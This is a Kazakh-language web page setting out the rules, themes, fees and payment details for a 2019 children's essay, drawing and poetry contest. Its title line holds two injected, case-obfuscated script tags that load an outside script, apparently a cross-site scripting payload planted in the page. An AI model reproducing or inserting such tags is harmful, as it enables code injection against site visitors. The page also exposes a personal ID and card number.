Жүзден Жүйрік - Интеллектуалды білім порталы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
04.02.2019
Жалпы ереже
1. БАЙҚАУДЫҢ МАҚСАТТАРЫ МЕН МІНДЕТТЕРІ
- Дарынды балаларды анықтау және оларды қолдау
- Баланың әлемді эмоционалдық тұрғыдан танудағы эстетикалық сезімі, оның жеке шығармашылық дамуы
- Отанға деген махаббат пен өнегелік - патриоттық сезімді тәрбиелеу;
- Мектепке дейінгі жастағы балаларды жалпы адами құндылықтар мен мәдениетке баулу;
- Балалардың елестету, қиялдау қабілеттерінің және көркем шығармашылығының дамуын ынталандыру;
2. Байқау тақырыптары:
- «Мен таңдаған мамандық» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Мен және менің ұстазым» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Әке - асқар тау» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Өлең-өмір» - еркін тақырыпта кез келген ақынның өлеңін мәнерлеп оқу
- «Қылқалам шебері» - еркін тақырыпта сурет салу
- «Туған өлкем, неткен көркем» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
- «Жас ақындар мүшәйрасы» - қатысушы өзі шығарған өлеңін жолдайды
- «Көркем жазу» - Төлеген Айбергеновтың «Өсіп келе жатырмын» өлеңін көшіріп жазу
- «Тамаша ғой қыс деген» - жұмыстар эссе, шығарма, сурет, өлең түрінде қабылданады
3. БАЙҚАУДЫ ӨТКІЗУ МЕРЗІМІ
Байқауды өткізу мерзімі: 1 ақпан – 16 ақпан 2019 жыл, нәтижесі 18 ақпан күні жарияланып, марапат материалдары 3 күн ішінде қатыстырушының жеке почтасына жіберіледі.
4. Байқау қатысушылары мен жас ерекшеліктері
Байқауға қатысуға мектеп жасына дейінгі бүлдіршіндер, яғни мектеп алды даярлық топтары мен 1-11 сынып оқушылары шақырылады. Балаларды тәрбиешілер, ұстаздар немесе ата-аналар ұсынады.
5. БАҒАЛАУ ӨЛШЕМДЕРІ
• Мазмұны мен тақырыбының сәйкестігі
• Орындалу сапасы: нақтылық пен жүйелілік
• Дәйектілік пен бірізділік
• Грамматикалық, орфографиялық, пунктуациялық, тілдік қателердің болмауы
6. БАЙҚАУ ҚАТЫСУШЫЛАРЫН МАРАПАТТАУ
Әр номинацияда I, II, III дәрежелі лауреат атағы және Дипломант атағы беріледі
Балаларды байқауға дайындағаны үшін барлық мұғалімдер, балаларды ұсынған шығармашылық топтардың жетекшілері марапатталады.
7. БАЙҚАУ ҚАТЫСУШЫЛАРЫНА ҚАЖЕТТІ ҚҰЖАТТАР
1. Байқауға қатысу туралы сұраныс үлгісін толтыру;
|
№ |
Аты-жөні |
Оқу орны |
Сыныбы/тобы |
Мұғалімі |
Байқау атауы |
|
1 |
|
|
|
|
|
|
2 |
|
|
|
|
|
|
3 |
|
|
|
|
|
2. Байқауға қатысу үшін 500 (бес жүз) теңге ұйымдастыру жарнасы төлеу
3. Байқауға қатысу жарнасын төлегенін растайтын түбіртекті (квитанция) оқушы жұмысы мен сұраныс хатына қосып juirik2019@mail.ru почтасына жіберу керек
Байқауға қатысу үшін төлем жүргізу реквезиттері:
QIWI әмиан/кошелек: 8 777 605 66 22
Билайн байланыс операторының номеріне бірлік ретінде төлем жасау: 8 777 605 66 22
Kaspi Gold карт шотына ақша аударымын кез келген төлем терминалы арқылы (ИИН 890619401340, №5169 4931 8226 8048)
Байқау қатысушысын тіркеу жұмыстары ұйымдастыру жарнасы төленгеннен кейін және қажетті құжаттар толық жеткізілгеннен кейін жүзеге асады
Ережеге сәйкес келмейтін және белгіленген уақыттан кейін жіберілген жұмыстар байқауға жіберілмейді.
Ескерту
- Байқаудың ұйымдастырушылары қатысушылар туралы барлық жеке ақпарат құпия түрде сақталатындығына кепілдік береді
Байқауға қатысу туралы сұрақтар бойынша мына телефон нөміріне хабарласуға болады:
87776056622 жұмыс уақыты: 9.00-ден 18.00-ге дейін